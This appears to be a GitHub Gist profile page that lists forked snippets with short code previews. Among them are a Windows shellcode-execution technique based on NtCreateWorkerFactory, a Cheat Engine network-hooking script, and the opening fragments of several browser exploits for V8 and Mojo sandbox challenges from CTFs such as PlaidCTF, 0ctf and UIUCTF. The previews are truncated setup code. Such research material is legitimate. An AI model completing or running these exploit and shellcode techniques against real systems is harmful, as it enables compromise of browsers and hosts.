Skip to content

Instantly share code, notes, and snippets.

View bb33bb's full-sized avatar
💭
I may be slow to respond.

boy1337 bb33bb

💭
I may be slow to respond.
485 followers · 569 following
View GitHub Profile
@bb33bb
bb33bb / Source.cpp
Created May 5, 2023 21:53 — forked from alfarom256/Source.cpp
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER
@bb33bb
bb33bb / shellcode_exec_workerfactory.c
Created May 5, 2023 21:53 — forked from RistBS/shellcode_exec_workerfactory.c
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@bb33bb
bb33bb / ce_hook_network.lua
Created June 13, 2022 07:47 — forked from robb83/ce_hook_network.lua
Cheat Engine Scripts
-- Simple network hook script
addressOfSend = getAddress("WS2_32.send")
addressOfGetStatus1 = getAddress("Kernel32.GetQueuedCompletionStatus")
addressOfGetStatus2 = getAddress("Kernel32.GetQueuedCompletionStatusEx")
addressOfCreateIoCompletionPort = getAddress("Kernel32.CreateIoCompletionPort")
print(string.format("WS2_32.send = %x, Kernel32.GetQueuedCompletionStatus = %x, Kernel32.GetQueuedCompletionStatusEx = %x, Kernel32.CreateIoCompletionPort = %x", addressOfSend, addressOfGetStatus1, addressOfGetStatus2, addressOfCreateIoCompletionPort))
debug_removeBreakpoint(addressOfSend)
debug_removeBreakpoint(addressOfGetStatus1)
debug_removeBreakpoint(addressOfGetStatus2)
@bb33bb
bb33bb / chrome-v8-issue-1126249.js
Created April 20, 2022 15:29 — forked from hkraw/chrome-v8-issue-1126249.js
class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
}
ftoi(f) {
@bb33bb
bb33bb / windbg_pwndbg_wrap.js
Created April 20, 2022 15:29 — forked from hkraw/windbg_pwndbg_wrap.js
add proper chain handling
//"use script";
const color_red = "";
const color_green = "";
const color_yellow = "";
const color_blue = "";
const color_mag = "";
const color_cyan = "";
const color_default = "";
@bb33bb
bb33bb / plaidCTF-the-false-promise.html
Created April 20, 2022 15:27 — forked from hkraw/plaidCTF-the-false-promise.html
<html>
<head>
<script>
( async() => {
let gc = function() {
for(let i = 0; i < 100; i++) {
new ArrayBuffer(0x10000000);
}
}
@bb33bb
bb33bb / javascript-for-dummies-1.js
Created April 20, 2022 15:25 — forked from hkraw/javascript-for-dummies-1.js
function pwn() {
/* Helpers */
var k_jsObjectSize = 0x70
var fclose_got = 0x45e58
var __libc_atoi = 0x18ea90
var __libc_environ = 0x1ef2e0
var __free_got = 0x4dde0
var __je_free = 0x13b10
@bb33bb
bb33bb / redpwn-empires.html
Created April 20, 2022 15:25 — forked from hkraw/redpwn-empires.html
<html>
<head>
<title>RedPwn sbx-1</title>
</head>
<body>
<h1>:thonk:</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./third_party/blink/public/mojom/desert.mojom.js'></script>
@bb33bb
bb33bb / 0ctf2020-fullchain++-cfi.html
Created April 20, 2022 15:25 — forked from hkraw/0ctf2020-fullchain++-cfi.html
<html>
<head>
<title>0ctf sbx</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script>
@bb33bb
bb33bb / should've_had_a_v8_exploit.md
Created April 20, 2022 15:23 — forked from hkraw/should've_had_a_v8_exploit.md
UIUCTF-2021

Exploit (First blood)

let wasm_code = new Uint8Array([
  0, 97,115,109,  1,  0,  0,  0,  1,133,128,128,128,  0,
  1, 96,  0,  1,127,  3,130,128,128,128,  0,  1,  0,  4,
  132,128,128,128,  0,  1,112,  0,  0,  5,131,128,128,128,
  0,  1,  0,  1,  6,129,128,128,128,  0,  0,  7,145,128,
  128,128,  0,2,6,109,101,109,111,114,121,2,0,4,109,97,
  105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
  0,65,42,11